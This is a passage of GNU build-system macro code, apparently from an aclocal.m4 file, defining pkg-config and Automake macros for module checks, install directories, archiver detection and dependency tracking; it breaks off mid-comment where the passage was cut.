AC_ARG_VAR([PKG_CONFIG_LIBDIR], [path overriding pkg-config's built-in search path]) if test "x$ac_cv_env_PKG_CONFIG_set" != "xset"; then AC_PATH_TOOL([PKG_CONFIG], [pkg-config]) fi if test -n "$PKG_CONFIG"; then _pkg_min_version=m4_default([$1], [0.9.0]) AC_MSG_CHECKING([pkg-config is at least version $_pkg_min_version]) if $PKG_CONFIG --atleast-pkgconfig-version $_pkg_min_version; then AC_MSG_RESULT([yes]) else AC_MSG_RESULT([no]) PKG_CONFIG="" fi fi[]dnl ])dnl PKG_PROG_PKG_CONFIG dnl PKG_CHECK_EXISTS(MODULES, [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ------------------------------------------------------------------- dnl Since: 0.18 dnl dnl Check to see whether a particular set of modules exists. Similar to dnl PKG_CHECK_MODULES(), but does not set variables or print errors. dnl dnl Please remember that m4 expands AC_REQUIRE([PKG_PROG_PKG_CONFIG]) dnl only at the first occurence in configure.ac, so if the first place dnl it's called might be skipped (such as if it is within an "if", you dnl have to call PKG_CHECK_EXISTS manually AC_DEFUN([PKG_CHECK_EXISTS], [AC_REQUIRE([PKG_PROG_PKG_CONFIG])dnl if test -n "$PKG_CONFIG" && \ AC_RUN_LOG([$PKG_CONFIG --exists --print-errors "$1"]); then m4_default([$2], [:]) m4_ifvaln([$3], [else $3])dnl fi]) dnl _PKG_CONFIG([VARIABLE], [COMMAND], [MODULES]) dnl --------------------------------------------- dnl Internal wrapper calling pkg-config via PKG_CONFIG and setting dnl pkg_failed based on the result. m4_define([_PKG_CONFIG], [if test -n "$$1"; then pkg_cv_[]$1="$$1" elif test -n "$PKG_CONFIG"; then PKG_CHECK_EXISTS([$3], [pkg_cv_[]$1=`$PKG_CONFIG --[]$2 "$3" 2>/dev/null` test "x$?" != "x0" && pkg_failed=yes ], [pkg_failed=yes]) else pkg_failed=untried fi[]dnl ])dnl _PKG_CONFIG dnl _PKG_SHORT_ERRORS_SUPPORTED dnl --------------------------- dnl Internal check to see if pkg-config supports short errors. AC_DEFUN([_PKG_SHORT_ERRORS_SUPPORTED], [AC_REQUIRE([PKG_PROG_PKG_CONFIG]) if $PKG_CONFIG --atleast-pkgconfig-version 0.20; then _pkg_short_errors_supported=yes else _pkg_short_errors_supported=no fi[]dnl ])dnl _PKG_SHORT_ERRORS_SUPPORTED dnl PKG_CHECK_MODULES(VARIABLE-PREFIX, MODULES, [ACTION-IF-FOUND], dnl [ACTION-IF-NOT-FOUND]) dnl -------------------------------------------------------------- dnl Since: 0.4.0 dnl dnl Note that if there is a possibility the first call to dnl PKG_CHECK_MODULES might not happen, you should be sure to include an dnl explicit call to PKG_PROG_PKG_CONFIG in your configure.ac AC_DEFUN([PKG_CHECK_MODULES], [AC_REQUIRE([PKG_PROG_PKG_CONFIG])dnl AC_ARG_VAR([$1][_CFLAGS], [C compiler flags for $1, overriding pkg-config])dnl AC_ARG_VAR([$1][_LIBS], [linker flags for $1, overriding pkg-config])dnl pkg_failed=no AC_MSG_CHECKING([for $1]) _PKG_CONFIG([$1][_CFLAGS], [cflags], [$2]) _PKG_CONFIG([$1][_LIBS], [libs], [$2]) m4_define([_PKG_TEXT], [Alternatively, you may set the environment variables $1[]_CFLAGS and $1[]_LIBS to avoid the need to call pkg-config. See the pkg-config man page for more details.]) if test $pkg_failed = yes; then AC_MSG_RESULT([no]) _PKG_SHORT_ERRORS_SUPPORTED if test $_pkg_short_errors_supported = yes; then $1[]_PKG_ERRORS=`$PKG_CONFIG --short-errors --print-errors --cflags --libs "$2" 2>&1` else $1[]_PKG_ERRORS=`$PKG_CONFIG --print-errors --cflags --libs "$2" 2>&1` fi # Put the nasty error message in config.log where it belongs echo "$$1[]_PKG_ERRORS" >&AS_MESSAGE_LOG_FD m4_default([$4], [AC_MSG_ERROR( [Package requirements ($2) were not met: $$1_PKG_ERRORS Consider adjusting the PKG_CONFIG_PATH environment variable if you installed software in a non-standard prefix. _PKG_TEXT])[]dnl ]) elif test $pkg_failed = untried; then AC_MSG_RESULT([no]) m4_default([$4], [AC_MSG_FAILURE( [The pkg-config script could not be found or is too old. Make sure it is in your PATH or set the PKG_CONFIG environment variable to the full path to pkg-config. _PKG_TEXT To get pkg-config, see .])[]dnl ]) else $1[]_CFLAGS=$pkg_cv_[]$1[]_CFLAGS $1[]_LIBS=$pkg_cv_[]$1[]_LIBS AC_MSG_RESULT([yes]) $3 fi[]dnl ])dnl PKG_CHECK_MODULES dnl PKG_CHECK_MODULES_STATIC(VARIABLE-PREFIX, MODULES, [ACTION-IF-FOUND], dnl [ACTION-IF-NOT-FOUND]) dnl --------------------------------------------------------------------- dnl Since: 0.29 dnl dnl Checks for existence of MODULES and gathers its build flags with dnl static libraries enabled. Sets VARIABLE-PREFIX_CFLAGS from --cflags dnl and VARIABLE-PREFIX_LIBS from --libs. dnl dnl Note that if there is a possibility the first call to dnl PKG_CHECK_MODULES_STATIC might not happen, you should be sure to dnl include an explicit call to PKG_PROG_PKG_CONFIG in your dnl configure.ac. AC_DEFUN([PKG_CHECK_MODULES_STATIC], [AC_REQUIRE([PKG_PROG_PKG_CONFIG])dnl _save_PKG_CONFIG=$PKG_CONFIG PKG_CONFIG="$PKG_CONFIG --static" PKG_CHECK_MODULES($@) PKG_CONFIG=$_save_PKG_CONFIG[]dnl ])dnl PKG_CHECK_MODULES_STATIC dnl PKG_INSTALLDIR([DIRECTORY]) dnl ------------------------- dnl Since: 0.27 dnl dnl Substitutes the variable pkgconfigdir as the location where a module dnl should install pkg-config .pc files. By default the directory is dnl $libdir/pkgconfig, but the default can be changed by passing dnl DIRECTORY. The user can override through the --with-pkgconfigdir dnl parameter. AC_DEFUN([PKG_INSTALLDIR], [m4_pushdef([pkg_default], [m4_default([$1], ['${libdir}/pkgconfig'])]) m4_pushdef([pkg_description], [pkg-config installation directory @<:@]pkg_default[@:>@]) AC_ARG_WITH([pkgconfigdir], [AS_HELP_STRING([--with-pkgconfigdir], pkg_description)],, [with_pkgconfigdir=]pkg_default) AC_SUBST([pkgconfigdir], [$with_pkgconfigdir]) m4_popdef([pkg_default]) m4_popdef([pkg_description]) ])dnl PKG_INSTALLDIR dnl PKG_NOARCH_INSTALLDIR([DIRECTORY]) dnl -------------------------------- dnl Since: 0.27 dnl dnl Substitutes the variable noarch_pkgconfigdir as the location where a dnl module should install arch-independent pkg-config .pc files. By dnl default the directory is $datadir/pkgconfig, but the default can be dnl changed by passing DIRECTORY. The user can override through the dnl --with-noarch-pkgconfigdir parameter. AC_DEFUN([PKG_NOARCH_INSTALLDIR], [m4_pushdef([pkg_default], [m4_default([$1], ['${datadir}/pkgconfig'])]) m4_pushdef([pkg_description], [pkg-config arch-independent installation directory @<:@]pkg_default[@:>@]) AC_ARG_WITH([noarch-pkgconfigdir], [AS_HELP_STRING([--with-noarch-pkgconfigdir], pkg_description)],, [with_noarch_pkgconfigdir=]pkg_default) AC_SUBST([noarch_pkgconfigdir], [$with_noarch_pkgconfigdir]) m4_popdef([pkg_default]) m4_popdef([pkg_description]) ])dnl PKG_NOARCH_INSTALLDIR dnl PKG_CHECK_VAR(VARIABLE, MODULE, CONFIG-VARIABLE, dnl [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ------------------------------------------- dnl Since: 0.28 dnl dnl Retrieves the value of the pkg-config variable for the given module. AC_DEFUN([PKG_CHECK_VAR], [AC_REQUIRE([PKG_PROG_PKG_CONFIG])dnl AC_ARG_VAR([$1], [value of $3 for $2, overriding pkg-config])dnl _PKG_CONFIG([$1], [variable="][$3]["], [$2]) AS_VAR_COPY([$1], [pkg_cv_][$1]) AS_VAR_IF([$1], [""], [$5], [$4])dnl ])dnl PKG_CHECK_VAR dnl PKG_WITH_MODULES(VARIABLE-PREFIX, MODULES, dnl [ACTION-IF-FOUND],[ACTION-IF-NOT-FOUND], dnl [DESCRIPTION], [DEFAULT]) dnl ------------------------------------------ dnl dnl Prepare a "--with-" configure option using the lowercase dnl [VARIABLE-PREFIX] name, merging the behaviour of AC_ARG_WITH and dnl PKG_CHECK_MODULES in a single macro. AC_DEFUN([PKG_WITH_MODULES], [ m4_pushdef([with_arg], m4_tolower([$1])) m4_pushdef([description], [m4_default([$5], [build with ]with_arg[ support])]) m4_pushdef([def_arg], [m4_default([$6], [auto])]) m4_pushdef([def_action_if_found], [AS_TR_SH([with_]with_arg)=yes]) m4_pushdef([def_action_if_not_found], [AS_TR_SH([with_]with_arg)=no]) m4_case(def_arg, [yes],[m4_pushdef([with_without], [--without-]with_arg)], [m4_pushdef([with_without],[--with-]with_arg)]) AC_ARG_WITH(with_arg, AS_HELP_STRING(with_without, description[ @<:@default=]def_arg[@:>@]),, [AS_TR_SH([with_]with_arg)=def_arg]) AS_CASE([$AS_TR_SH([with_]with_arg)], [yes],[PKG_CHECK_MODULES([$1],[$2],$3,$4)], [auto],[PKG_CHECK_MODULES([$1],[$2], [m4_n([def_action_if_found]) $3], [m4_n([def_action_if_not_found]) $4])]) m4_popdef([with_arg]) m4_popdef([description]) m4_popdef([def_arg]) ])dnl PKG_WITH_MODULES dnl PKG_HAVE_WITH_MODULES(VARIABLE-PREFIX, MODULES, dnl [DESCRIPTION], [DEFAULT]) dnl ----------------------------------------------- dnl dnl Convenience macro to trigger AM_CONDITIONAL after PKG_WITH_MODULES dnl check._[VARIABLE-PREFIX] is exported as make variable. AC_DEFUN([PKG_HAVE_WITH_MODULES], [ PKG_WITH_MODULES([$1],[$2],,,[$3],[$4]) AM_CONDITIONAL([HAVE_][$1], [test "$AS_TR_SH([with_]m4_tolower([$1]))" = "yes"]) ])dnl PKG_HAVE_WITH_MODULES dnl PKG_HAVE_DEFINE_WITH_MODULES(VARIABLE-PREFIX, MODULES, dnl [DESCRIPTION], [DEFAULT]) dnl ------------------------------------------------------ dnl dnl Convenience macro to run AM_CONDITIONAL and AC_DEFINE after dnl PKG_WITH_MODULES check. HAVE_[VARIABLE-PREFIX] is exported as make dnl and preprocessor variable. AC_DEFUN([PKG_HAVE_DEFINE_WITH_MODULES], [ PKG_HAVE_WITH_MODULES([$1],[$2],[$3],[$4]) AS_IF([test "$AS_TR_SH([with_]m4_tolower([$1]))" = "yes"], [AC_DEFINE([HAVE_][$1], 1, [Enable ]m4_tolower([$1])[ support])]) ])dnl PKG_HAVE_DEFINE_WITH_MODULES # Copyright (C) 2002-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_AUTOMAKE_VERSION(VERSION) # ---------------------------- # Automake X.Y traces this macro to ensure aclocal.m4 has been # generated from the m4 files accompanying Automake X.Y. # (This private macro should not be called outside this file.) AC_DEFUN([AM_AUTOMAKE_VERSION], [am__api_version='1.16' dnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to dnl require some minimum version. Point them to the right macro. m4_if([$1], [1.16.1], [], [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl ]) # _AM_AUTOCONF_VERSION(VERSION) # ----------------------------- # aclocal traces this macro to find the Autoconf version. # This is a private macro too. Using m4_define simplifies # the logic in aclocal, which can simply ignore this definition. m4_define([_AM_AUTOCONF_VERSION], []) # AM_SET_CURRENT_AUTOMAKE_VERSION # ------------------------------- # Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced. # This function is AC_REQUIREd by AM_INIT_AUTOMAKE. AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], [AM_AUTOMAKE_VERSION([1.16.1])dnl m4_ifndef([AC_AUTOCONF_VERSION], [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl _AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))]) # Copyright (C) 2011-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_PROG_AR([ACT-IF-FAIL]) # ------------------------- # Try to determine the archiver interface, and trigger the ar-lib wrapper # if it is needed. If the detection of archiver interface fails, run # ACT-IF-FAIL (default is to abort configure with a proper error message). AC_DEFUN([AM_PROG_AR], [AC_BEFORE([$0], [LT_INIT])dnl AC_BEFORE([$0], [AC_PROG_LIBTOOL])dnl AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl AC_REQUIRE_AUX_FILE([ar-lib])dnl AC_CHECK_TOOLS([AR], [ar lib "link -lib"], [false]) : ${AR=ar} AC_CACHE_CHECK([the archiver ($AR) interface], [am_cv_ar_interface], [AC_LANG_PUSH([C]) am_cv_ar_interface=ar AC_COMPILE_IFELSE([AC_LANG_SOURCE([[int some_variable = 0;]])], [am_ar_try='$AR cru libconftest.a conftest.$ac_objext >&AS_MESSAGE_LOG_FD' AC_TRY_EVAL([am_ar_try]) if test "$ac_status" -eq 0; then am_cv_ar_interface=ar else am_ar_try='$AR -NOLOGO -OUT:conftest.lib conftest.$ac_objext >&AS_MESSAGE_LOG_FD' AC_TRY_EVAL([am_ar_try]) if test "$ac_status" -eq 0; then am_cv_ar_interface=lib else am_cv_ar_interface=unknown fi fi rm -f conftest.lib libconftest.a ]) AC_LANG_POP([C])]) case $am_cv_ar_interface in ar) ;; lib) # Microsoft lib, so override with the ar-lib wrapper script. # FIXME: It is wrong to rewrite AR. # But if we don't then we get into trouble of one sort or another. # A longer-term fix would be to have automake use am__AR in this case, # and then we could set am__AR="$am_aux_dir/ar-lib \$(AR)" or something # similar. AR="$am_aux_dir/ar-lib $AR" ;; unknown) m4_default([$1], [AC_MSG_ERROR([could not determine $AR interface])]) ;; esac AC_SUBST([AR])dnl ]) # AM_AUX_DIR_EXPAND -*- Autoconf -*- # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # For projects using AC_CONFIG_AUX_DIR([foo]), Autoconf sets # $ac_aux_dir to '$srcdir/foo'. In other projects, it is set to # '$srcdir', '$srcdir/..', or '$srcdir/../..'. # # Of course, Automake must honor this variable whenever it calls a # tool from the auxiliary directory. The problem is that $srcdir (and # therefore $ac_aux_dir as well) can be either absolute or relative, # depending on how configure is run. This is pretty annoying, since # it makes $ac_aux_dir quite unusable in subdirectories: in the top # source directory, any form will work fine, but in subdirectories a # relative path needs to be adjusted first. # # $ac_aux_dir/missing # fails when called from a subdirectory if $ac_aux_dir is relative # $top_srcdir/$ac_aux_dir/missing # fails if $ac_aux_dir is absolute, # fails when called from a subdirectory in a VPATH build with # a relative $ac_aux_dir # # The reason of the latter failure is that $top_srcdir and $ac_aux_dir # are both prefixed by $srcdir. In an in-source build this is usually # harmless because $srcdir is '.', but things will broke when you # start a VPATH build or use an absolute $srcdir. # # So we could use something similar to $top_srcdir/$ac_aux_dir/missing, # iff we strip the leading $srcdir from $ac_aux_dir. That would be: # am_aux_dir='\$(top_srcdir)/'`expr "$ac_aux_dir" : "$srcdir//*\(.*\)"` # and then we would define $MISSING as # MISSING="\${SHELL} $am_aux_dir/missing" # This will work as long as MISSING is not called from configure, because # unfortunately $(top_srcdir) has no meaning in configure. # However there are other variables, like CC, which are often used in # configure, and could therefore not use this "fixed" $ac_aux_dir. # # Another solution, used here, is to always expand $ac_aux_dir to an # absolute PATH. The drawback is that using absolute paths prevent a # configured tree to be moved without reconfiguration. AC_DEFUN([AM_AUX_DIR_EXPAND], [AC_REQUIRE([AC_CONFIG_AUX_DIR_DEFAULT])dnl # Expand $ac_aux_dir to an absolute path. am_aux_dir=`cd "$ac_aux_dir" && pwd` ]) # AM_COND_IF -*- Autoconf -*- # Copyright (C) 2008-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_COND_IF # _AM_COND_ELSE # _AM_COND_ENDIF # -------------- # These macros are only used for tracing. m4_define([_AM_COND_IF]) m4_define([_AM_COND_ELSE]) m4_define([_AM_COND_ENDIF]) # AM_COND_IF(COND, [IF-TRUE], [IF-FALSE]) # --------------------------------------- # If the shell condition COND is true, execute IF-TRUE, otherwise execute # IF-FALSE. Allow automake to learn about conditional instantiating macros # (the AC_CONFIG_FOOS). AC_DEFUN([AM_COND_IF], [m4_ifndef([_AM_COND_VALUE_$1], [m4_fatal([$0: no such condition "$1"])])dnl _AM_COND_IF([$1])dnl if test -z "$$1_TRUE"; then : m4_n([$2])[]dnl m4_ifval([$3], [_AM_COND_ELSE([$1])dnl else $3 ])dnl _AM_COND_ENDIF([$1])dnl fi[]dnl ]) # AM_CONDITIONAL -*- Autoconf -*- # Copyright (C) 1997-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_CONDITIONAL(NAME, SHELL-CONDITION) # ------------------------------------- # Define a conditional. AC_DEFUN([AM_CONDITIONAL], [AC_PREREQ([2.52])dnl m4_if([$1], [TRUE], [AC_FATAL([$0: invalid condition: $1])], [$1], [FALSE], [AC_FATAL([$0: invalid condition: $1])])dnl AC_SUBST([$1_TRUE])dnl AC_SUBST([$1_FALSE])dnl _AM_SUBST_NOTMAKE([$1_TRUE])dnl _AM_SUBST_NOTMAKE([$1_FALSE])dnl m4_define([_AM_COND_VALUE_$1], [$2])dnl if $2; then $1_TRUE= $1_FALSE='#' else $1_TRUE='#' $1_FALSE= fi AC_CONFIG_COMMANDS_PRE( [if test -z "${$1_TRUE}" && test -z "${$1_FALSE}"; then AC_MSG_ERROR([[conditional "$1" was never defined. Usually this means the macro was only invoked conditionally.]]) fi])]) # Copyright (C) 1999-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # There are a few dirty hacks below to avoid letting 'AC_PROG_CC' be # written in clear, in which case automake, when reading aclocal.m4, # will think it sees a *use*, and therefore will trigger all it's # C support machinery. Also note that it means that autoscan, seeing # CC etc. in the Makefile, will ask for an AC_PROG_CC use... # _AM_DEPENDENCIES(NAME) # ---------------------- # See how the compiler implements dependency checking. # NAME is "CC", "CXX", "OBJC", "OBJCXX", "UPC", or "GJC". # We try a few techniques and use that to set a single cache variable. # # We don't AC_REQUIRE the corresponding AC_PROG_CC since the latter was # modified to invoke _AM_DEPENDENCIES(CC); we would have a circular # dependency, and given that the user is not expected to run this macro, # just rely on AC_PROG_CC. AC_DEFUN([_AM_DEPENDENCIES], [AC_REQUIRE([AM_SET_DEPDIR])dnl AC_REQUIRE([AM_OUTPUT_DEPENDENCY_COMMANDS])dnl AC_REQUIRE([AM_MAKE_INCLUDE])dnl AC_REQUIRE([AM_DEP_TRACK])dnl m4_if([$1], [CC], [depcc="$CC" am_compiler_list=], [$1], [CXX], [depcc="$CXX" am_compiler_list=], [$1], [OBJC], [depcc="$OBJC" am_compiler_list='gcc3 gcc'], [$1], [OBJCXX], [depcc="$OBJCXX" am_compiler_list='gcc3 gcc'], [$1], [UPC], [depcc="$UPC" am_compiler_list=], [$1], [GCJ], [depcc="$GCJ" am_compiler_list='gcc3 gcc'], [depcc="$$1" am_compiler_list=]) AC_CACHE_CHECK([dependency style of $depcc], [am_cv_$1_dependencies_compiler_type], [if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then # We make a subdir and do the tests there. Otherwise we can end up # making bogus files that we don't know about and never remove. For # instance it was reported that on HP-UX the gcc test will end up # making a dummy file named 'D' -- because '-MD' means "put the output # in D". rm -rf conftest.dir mkdir conftest.dir # Copy depcomp to subdir because otherwise we won't find it if we're # using a relative directory. cp "$am_depcomp" conftest.dir cd conftest.dir # We will build objects and dependencies in a subdirectory because # it helps to detect inapplicable dependency modes. For instance # both Tru64's cc and ICC support -MD to output dependencies as a # side effect of compilation, but ICC will put the dependencies in # the current directory while Tru64 will put them in the object # directory. mkdir sub am_cv_$1_dependencies_compiler_type=none if test "$am_compiler_list" = ""; then am_compiler_list=`sed -n ['s/^#*\([a-zA-Z0-9]*\))$/\1/p'] < ./depcomp` fi am__universal=false m4_case([$1], [CC], [case " $depcc " in #( *\ -arch\ *\ -arch\ *) am__universal=true ;; esac], [CXX], [case " $depcc " in #( *\ -arch\ *\ -arch\ *) am__universal=true ;; esac]) for depmode in $am_compiler_list; do # Setup a source with many dependencies, because some compilers # like to wrap large dependency lists on column 80 (with \), and # we should not choose a depcomp mode which is confused by this. # # We need to recreate these files for each test, as the compiler may # overwrite some of them when testing with obscure command lines. # This happens at least with the AIX C compiler. : > sub/conftest.c for i in 1 2 3 4 5 6; do echo '#include "conftst'$i'.h"' >> sub/conftest.c # Using ": > sub/conftst$i.h" creates only sub/conftst1.h with # Solaris 10 /bin/sh. echo '/* dummy */' > sub/conftst$i.h done echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf # We check with '-c' and '-o' for the sake of the "dashmstdout" # mode. It turns out that the SunPro C++ compiler does not properly # handle '-M -o', and we need to detect this. Also, some Intel # versions had trouble with output in subdirs. am__obj=sub/conftest.${OBJEXT-o} am__minus_obj="-o $am__obj" case $depmode in gcc) # This depmode causes a compiler race in universal mode. test "$am__universal" = false || continue ;; nosideeffect) # After this tag, mechanisms are not by side-effect, so they'll # only be used when explicitly requested. if test "x$enable_dependency_tracking" = xyes; then continue else break fi ;; msvc7 | msvc7msys | msvisualcpp | msvcmsys) # This compiler won't grok '-c -o', but also, the minuso test has # not run yet. These depmodes are late enough in the game, and # so weak that their functioning should not be impacted. am__obj=conftest.${OBJEXT-o} am__minus_obj= ;; none) break ;; esac if depmode=$depmode \ source=sub/conftest.c object=$am__obj \ depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ >/dev/null 2>conftest.err && grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && grep $am__obj sub/conftest.Po > /dev/null 2>&1 && ${MAKE-make} -s -f confmf > /dev/null 2>&1; then # icc doesn't choke on unknown options, it will just issue warnings # or remarks (even with -Werror). So we grep stderr for any message # that says an option was ignored or not supported. # When given -MP, icc 7.0 and 7.1 complain thusly: # icc: Command line warning: ignoring option '-M'; no argument required # The diagnosis changed in icc 8.0: # icc: Command line remark: option '-MP' not supported if (grep 'ignoring option' conftest.err || grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else am_cv_$1_dependencies_compiler_type=$depmode break fi fi done cd .. rm -rf conftest.dir else am_cv_$1_dependencies_compiler_type=none fi ]) AC_SUBST([$1DEPMODE], [depmode=$am_cv_$1_dependencies_compiler_type]) AM_CONDITIONAL([am__fastdep$1], [ test "x$enable_dependency_tracking" != xno \ && test "$am_cv_$1_dependencies_compiler_type" = gcc3]) ]) # AM_SET_DEPDIR # ------------- # Choose a directory name for dependency files. # This macro is AC_REQUIREd in _AM_DEPENDENCIES. AC_DEFUN([AM_SET_DEPDIR], [AC_REQUIRE([AM_SET_LEADING_DOT])dnl AC_SUBST([DEPDIR], ["${am__leading_dot}deps"])dnl ]) # AM_DEP_TRACK # ------------ AC_DEFUN([AM_DEP_TRACK], [AC_ARG_ENABLE([dependency-tracking], [dnl AS_HELP_STRING( [--enable-dependency-tracking], [do not reject slow dependency extractors]) AS_HELP_STRING( [--disable-dependency-tracking], [speeds up one-time build])]) if test "x$enable_dependency_tracking" != xno; then am_depcomp="$ac_aux_dir/depcomp" AMDEPBACKSLASH='\' am__nodep='_no' fi AM_CONDITIONAL([AMDEP], [test "x$enable_dependency_tracking" != xno]) AC_SUBST([AMDEPBACKSLASH])dnl _AM_SUBST_NOTMAKE([AMDEPBACKSLASH])dnl AC_SUBST([am__nodep])dnl _AM_SUBST_NOTMAKE([am__nodep])dnl ]) # Generate code to set up dependency tracking. -*- Autoconf -*- # Copyright (C) 1999-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_OUTPUT_DEPENDENCY_COMMANDS # ------------------------------ AC_DEFUN([_AM_OUTPUT_DEPENDENCY_COMMANDS], [{ # Older Autoconf quotes --file arguments for eval, but not when files # are listed without --file. Let's play safe and only enable the eval # if we detect the quoting. # TODO: see whether this extra hack can be removed once we start # requiring Autoconf 2.70 or later. AS_CASE([$CONFIG_FILES], [*\'*], [eval set x "$CONFIG_FILES"], [*], [set x $CONFIG_FILES]) shift # Used to flag and report bootstrapping failures. am_rc=0 for am_mf do # Strip MF so we end up with the name of the file. am_mf=`AS_ECHO(["$am_mf"]) | sed -e 's/:.*$//'` # Check whether this is an Automake generated Makefile which includes # dependency-tracking related rules and includes. # Grep'ing the whole file directly is not great: AIX grep has a line # limit of 2048, but all sed's we know have understand at least 4000. sed -n 's,^am--depfiles:.*,X,p' "$am_mf" | grep X >/dev/null 2>&1 \ || continue am_dirpart=`AS_DIRNAME(["$am_mf"])` am_filepart=`AS_BASENAME(["$am_mf"])` AM_RUN_LOG([cd "$am_dirpart" \ && sed -e '/# am--include-marker/d' "$am_filepart" \ | $MAKE -f - am--depfiles]) || am_rc=$? done if test $am_rc -ne 0; then AC_MSG_FAILURE([Something went wrong bootstrapping makefile fragments for automatic dependency tracking. Try re-running configure with the '--disable-dependency-tracking' option to at least be able to build the package (albeit without support for automatic dependency tracking).]) fi AS_UNSET([am_dirpart]) AS_UNSET([am_filepart]) AS_UNSET([am_mf]) AS_UNSET([am_rc]) rm -f conftest-deps.mk } ])# _AM_OUTPUT_DEPENDENCY_COMMANDS # AM_OUTPUT_DEPENDENCY_COMMANDS # ----------------------------- # This macro should only be invoked once -- use via AC_REQUIRE. # # This code is only required when automatic dependency tracking is enabled. # This creates each '.Po' and '.Plo' makefile fragment that we'll need in # order to bootstrap the dependency handling code. AC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS], [AC_CONFIG_COMMANDS([depfiles], [test x"$AMDEP_TRUE" != x"" || _AM_OUTPUT_DEPENDENCY_COMMANDS], [AMDEP_TRUE="$AMDEP_TRUE" MAKE="${MAKE-make}"])]) # Do all the work for Automake. -*- Autoconf -*- # Copyright (C) 1996-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This macro actually does too much. Some checks are only needed if # your package does certain things. But this isn't really a big deal. dnl Redefine AC_PROG_CC to automatically invoke _AM_PROG_CC_C_O. m4_define([AC_PROG_CC], m4_defn([AC_PROG_CC]) [_AM_PROG_CC_C_O ]) # AM_INIT_AUTOMAKE(PACKAGE, VERSION, [NO-DEFINE]) # AM_INIT_AUTOMAKE([OPTIONS]) # ----------------------------------------------- # The call with PACKAGE and VERSION arguments is the old style # call (pre autoconf-2.50), which is being phased out. PACKAGE # and VERSION should now be passed to AC_INIT and removed from # the call to AM_INIT_AUTOMAKE. # We support both call styles for the transition. After # the next Automake release, Autoconf can make the AC_INIT # arguments mandatory, and then we can depend on a new Autoconf # release and drop the old call support. AC_DEFUN([AM_INIT_AUTOMAKE], [AC_PREREQ([2.65])dnl dnl Autoconf wants to disallow AM_ names. We explicitly allow dnl the ones we care about. m4_pattern_allow([^AM_[A-Z]+FLAGS$])dnl AC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl AC_REQUIRE([AC_PROG_INSTALL])dnl if test "`cd $srcdir && pwd`" != "`pwd`"; then # Use -I$(srcdir) only when $(srcdir) != ., so that make's output # is not polluted with repeated "-I." AC_SUBST([am__isrc], [' -I$(srcdir)'])_AM_SUBST_NOTMAKE([am__isrc])dnl # test to see if srcdir already configured if test -f $srcdir/config.status; then AC_MSG_ERROR([source directory already configured; run "make distclean" there first]) fi fi # test whether we have cygpath if test -z "$CYGPATH_W"; then if (cygpath --version) >/dev/null 2>/dev/null; then CYGPATH_W='cygpath -w' else CYGPATH_W=echo fi fi AC_SUBST([CYGPATH_W]) # Define the identity of the package. dnl Distinguish between old-style and new-style calls. m4_ifval([$2], [AC_DIAGNOSE([obsolete], [$0: two- and three-arguments forms are deprecated.]) m4_ifval([$3], [_AM_SET_OPTION([no-define])])dnl AC_SUBST([PACKAGE], [$1])dnl AC_SUBST([VERSION], [$2])], [_AM_SET_OPTIONS([$1])dnl dnl Diagnose old-style AC_INIT with new-style AM_AUTOMAKE_INIT. m4_if( m4_ifdef([AC_PACKAGE_NAME], [ok]):m4_ifdef([AC_PACKAGE_VERSION], [ok]), [ok:ok],, [m4_fatal([AC_INIT should be called with package and version arguments])])dnl AC_SUBST([PACKAGE], ['AC_PACKAGE_TARNAME'])dnl AC_SUBST([VERSION], ['AC_PACKAGE_VERSION'])])dnl _AM_IF_OPTION([no-define],, [AC_DEFINE_UNQUOTED([PACKAGE], ["$PACKAGE"], [Name of package]) AC_DEFINE_UNQUOTED([VERSION], ["$VERSION"], [Version number of package])])dnl # Some tools Automake needs. AC_REQUIRE([AM_SANITY_CHECK])dnl AC_REQUIRE([AC_ARG_PROGRAM])dnl AM_MISSING_PROG([ACLOCAL], [aclocal-${am__api_version}]) AM_MISSING_PROG([AUTOCONF], [autoconf]) AM_MISSING_PROG([AUTOMAKE], [automake-${am__api_version}]) AM_MISSING_PROG([AUTOHEADER], [autoheader]) AM_MISSING_PROG([MAKEINFO], [makeinfo]) AC_REQUIRE([AM_PROG_INSTALL_SH])dnl AC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl AC_REQUIRE([AC_PROG_MKDIR_P])dnl # For better backward compatibility. To be removed once Automake 1.9.x # dies out for good. For more background, see: # # AC_SUBST([mkdir_p], ['$(MKDIR_P)']) # We need awk for the "check" target (and possibly the TAP driver). The # system "awk" 